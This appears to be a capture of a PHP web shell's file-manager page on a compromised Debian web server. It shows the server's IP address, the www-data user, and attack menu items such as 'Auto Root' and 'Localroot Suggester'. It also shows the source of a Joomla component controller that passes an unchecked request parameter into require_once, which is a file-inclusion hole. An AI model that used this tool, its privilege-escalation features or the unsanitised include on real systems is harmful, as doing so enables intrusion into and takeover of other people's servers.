Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
components /
com_arrausermigrate /
Delete
Unzip
Name
Size
Permission
Date
Action
controllers
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
views
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
LICENSE.txt
18
KB
-rwxr-xr-x
2018-04-20 12:55
arrausermigrate.php
1.6
KB
-rwxr-xr-x
2018-04-20 12:55
controller.php
794
B
-rwxr-xr-x
2018-04-20 12:55
Save
Rename
<?php /** * ARRA User Export Import component for Joomla! 1.6 * @version 1.6.0 * @author ARRA (joomlarra@gmail.com) * @link http://www.joomlarra.com * @Copyright (C) 2010 - 2011 joomlarra.com. All Rights Reserved. * @license GNU General Public License version 2, see LICENSE.txt or http://www.gnu.org/licenses/gpl-2.0.html * PHP code files are distributed under the GPL license. All icons, images, and JavaScript code are NOT GPL (unless specified), and are released under the joomlarra Proprietary License, http://www.joomlarra.com/licenses.html */ defined( '_JEXEC' ) or die( 'Restricted access' ); defined('DS') or define("DS", DIRECTORY_SEPARATOR); jimport('joomla.application.component.controller'); // Require the base controller require_once(JPATH_COMPONENT.DIRECTORY_SEPARATOR.'controller.php'); // Require specific controller if requested $pattern = '/^[A-Za-z]*$/'; $controller = JFactory::getApplication()->input->get("controller", "", "raw"); if(trim($controller) != ""){ $path = JPATH_COMPONENT.DIRECTORY_SEPARATOR.'controllers'.DIRECTORY_SEPARATOR.$controller.'.php'; if (file_exists($path)) { require_once $path; } else{ $controller = ''; } } else{ $controller = "arra_eximp_cron"; $path = JPATH_COMPONENT.DIRECTORY_SEPARATOR.'controllers'.DIRECTORY_SEPARATOR.$controller.'.php'; if(file_exists($path)){ require_once $path; } } // Create the controller $classname = 'ArrausermigrateController'.$controller; $controller = new $classname(); $controller->execute(JFactory::getApplication()->input->get("task", "", "raw")); $controller->redirect(); ?>